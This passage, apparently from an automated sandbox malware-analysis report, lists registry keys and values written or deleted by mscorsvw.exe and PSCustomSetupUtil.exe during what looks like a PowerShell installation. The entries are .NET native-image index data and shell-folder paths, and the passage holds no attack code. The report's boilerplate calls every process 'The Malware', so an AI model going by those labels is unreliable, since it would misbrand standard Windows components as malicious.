[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 30 8D DE 11 51 E7 CF E1 D1 8B 22 AB 7A CB F2"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "97"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"SIG" = "7B 5D F0 E6 43 C6 6F 48 85 FF C5 61 E9 E4 D2 1B"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"LastModTime" = "58 E1 0A 3E 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]

The process mscorsvw.exe:2956 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F C7 59 36 0F 6B 35 1D A1 4C 84 BB F7 83 44 D6"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2088 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "4A 33 70 3A 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "04 43 1B 39 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 33 E9 63 61 CC 8E EB 7B C6 95 4A F1 F9 7D 6D"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]

The process mscorsvw.exe:3784 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"LastModTime" = "AE 4E C9 39 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"MVID" = "AB 6E A2 EF 90 77 0C 78 07 DB 52 DB 59 B5 A1 32"
"Status" = "0"
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2995e574\9\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A EA F3 98 F9 00 59 65 A9 D2 E9 D7 87 22 06 79"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "98"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"SIG" = "07 95 68 2E 6D 23 41 45 81 DB 7F 93 51 3C 97 66"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]

The process mscorsvw.exe:2572 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "5A 64 9E 39 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 7E 97 04 5A 3D 26 16 1E 66 8B E3 6B 51 AF CC"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]

The process mscorsvw.exe:1028 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 7C 3A 70 84 19 FB 0B DA D3 D7 39 8F DB 4A 62"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2108 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ConfigMask" = "4361"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\3fa824d2\11\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index65]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"MVID" = "E2 17 82 39 6B BC 18 53 A8 67 A6 33 0D FD 66 7B"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\afa163\1f\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index65]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ILDependencies" = "57 8D AB 19 D0 02 1A 29 07 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D AC F7 E2 E7 52 C0 9B 8F 3E 37 71 13 97 09 2B"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "101"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]

The process mscorsvw.exe:2536 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 39 3A 4B ED D9 34 C4 89 C0 39 D8 19 85 4C 1D"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The process mscorsvw.exe:1368 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 0C 12 46 06 54 30 9B 8D C5 D2 21 D8 F7 B8 87"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process PSCustomSetupUtil.exe:3940 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 13 2A 6A 86 8F 0A 07 82 AB 8B 73 9C 9E F0 AF"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "58 E1 0A 3E 31 74 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"

The process PSCustomSetupUtil.exe:3908 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 0D AF 98 9E 87 1F 23 3A B9 73 95 49 4B 01 2B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2968 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 BE 5D 0A DB 3B 09 40 10 D3 49 C3 FA E1 50 DB"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "58 2D 46 39 31 74 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"

The process PSCustomSetupUtil.exe:4016 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB BC 15 F9 6A 06 B4 3B F3 9F 3D 61 D9 3F 7E 17"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "0E DD 67 3E 31 74 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
